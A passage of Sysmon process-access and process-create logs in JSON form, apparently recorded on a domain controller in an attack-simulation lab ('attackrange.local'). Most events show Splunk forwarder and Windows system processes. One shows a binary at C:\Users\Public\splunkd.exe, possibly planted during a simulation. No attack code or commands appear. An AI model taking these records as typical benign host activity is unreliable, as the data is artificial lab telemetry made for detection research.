C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:57.199","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7492,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:57.199\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:57.199","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7493,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:57.199\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:57.199","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7494,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:57.199\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1329-5F25-0000-0010C57B0B00}\r\nTargetProcessId: 4892\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:57.199","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1329-5F25-0000-0010C57B0B00}","TargetProcessId":"4892","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7495,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:57.324\r\nSourceProcessGUID: {E2A3D6B1-1329-5F25-0000-0010C57B0B00}\r\nSourceProcessId: 4892\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:57.324","SourceProcessGUID":"{E2A3D6B1-1329-5F25-0000-0010C57B0B00}","SourceProcessId":"4892","SourceThreadId":"4424","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7496,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:57.621\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:57.621","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":7497,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:57.887\r\nProcessGuid: {E2A3D6B1-1329-5F25-0000-0010AB7D0B00}\r\nProcessId: 4932\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Network monitor\r\nProduct: Splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-netmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:00:57.887","ProcessGuid":"{E2A3D6B1-1329-5F25-0000-0010AB7D0B00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","FileVersion":"8.0.2","Description":"Network monitor","Product":"Splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-netmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:00:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7498,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:57.887\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1329-5F25-0000-0010AB7D0B00}\r\nTargetProcessId: 4932\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:57.887","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1329-5F25-0000-0010AB7D0B00}","TargetProcessId":"4932","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7499,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:57.887\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1329-5F25-0000-0010AB7D0B00}\r\nTargetProcessId: 4932\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:57.887","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1329-5F25-0000-0010AB7D0B00}","TargetProcessId":"4932","TargetImage":"C:\\Program 